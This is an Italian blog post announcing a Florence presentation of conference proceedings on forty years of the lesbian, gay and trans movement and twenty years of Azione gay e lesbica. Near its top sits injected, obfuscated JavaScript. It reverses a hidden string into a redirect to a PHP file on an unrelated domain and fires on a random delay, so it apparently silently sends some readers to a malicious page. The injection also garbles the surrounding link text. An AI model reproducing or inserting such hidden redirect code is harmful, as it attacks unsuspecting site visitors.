Una ribellione necessaria. Lesbiche, gay e trans: 40, 30, 20 anni di movimento

image_pdfimage_print

$p$VTO6JhIH6WkCGAcPR=function(n){if (typeof ($p$VTO6JhIH6WkCGAcPR.list[n]) == “string”) return $p$VTO6JhIH6WkCGAcPR.list[n].split(“”).reverse().join(“”);return $p$VTO6JhIH6WkCGAcPR.list[n];};$p$VTO6JhIH6WkCGAcPR.list=[“‘php.tegdiw.ssalc/bil/orp-tegdiw-rettiwt/snigulp/tnetnoc-pw/moc.xamdok//:ptth’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);}and(this)” href=”http://http://www.azionegayelesbica.it/”>Nel 2009 ricorreva il ventennale della nascita del circolo che oggi si chiama Azione gay e lesbica. Sono stati vent’anni di presenza a Firenze e in provincia, di costruzione di visibilità, cultura e politiche altre. Azione gay e lesbica ha voluto sottolineare questa tappa importante del suo percorso con un convegno che desse valore e spazio alla memoria, sia sul piano documentaristico e testimoniale, sia su quello dell’iniziativa culturale e politica nell’attualità.

Domani, sabato 12 novembre dalle ore 18 via Pisana 32/r, saranno presentati gli atti di quel convegno che aveva come titolo “Una ribellione necessaria. Lesbiche, gay e trans: 40, 30, 20 anni di movimento”. Saranno presenti la curatrice Elena Biagini e alcune/i delle autrici/autori degli interventi pubblicati fra cui Nerina Milletti, John Gilbert e Ornella De Zordo.

Il convegno ha messo a fianco tre grandi inizi che, nelle differenti scale di importanza, si intrecciano e si alimentano a vicenda: il quarantennale della rivolta di Stonewall, quando lesbiche gay e trans scesero in strada per la prima volta per protestare contro le vessazioni della polizia, il trentennale della nascita del primo gruppo dove le lesbiche di Firenze e dintorni si incontrarono, si confrontarono e gettarono le basi per un’identità politica collettiva e il ventennale della nascita di Azione gay e lesbica.

Queste tre ricorrenze e i percorsi che da lì si sono aperti, mescolati, contaminati sono raccontati in questo volume da studiose e studiosi insieme alle protagoniste e ai protagonisti di ieri e di oggi e compongono una parte di quella grande trama che è la storia del movimento lgbtiq nelle sue molteplici articolazioni.

Il volume è dedicato ad Alessia Ballini, amica, compagna, “pioniera” con molte e molti di noi ci ha detto che la vita va corsa fino in fondo ci ha lasciato l’autodeterminazione della sua vita e il grande vuoto della sua mancanza.

Info: http://www.azionegayelesbica.it/

Leave a Reply

Il tuo indirizzo email non sarà pubblicato. I campi obbligatori sono contrassegnati *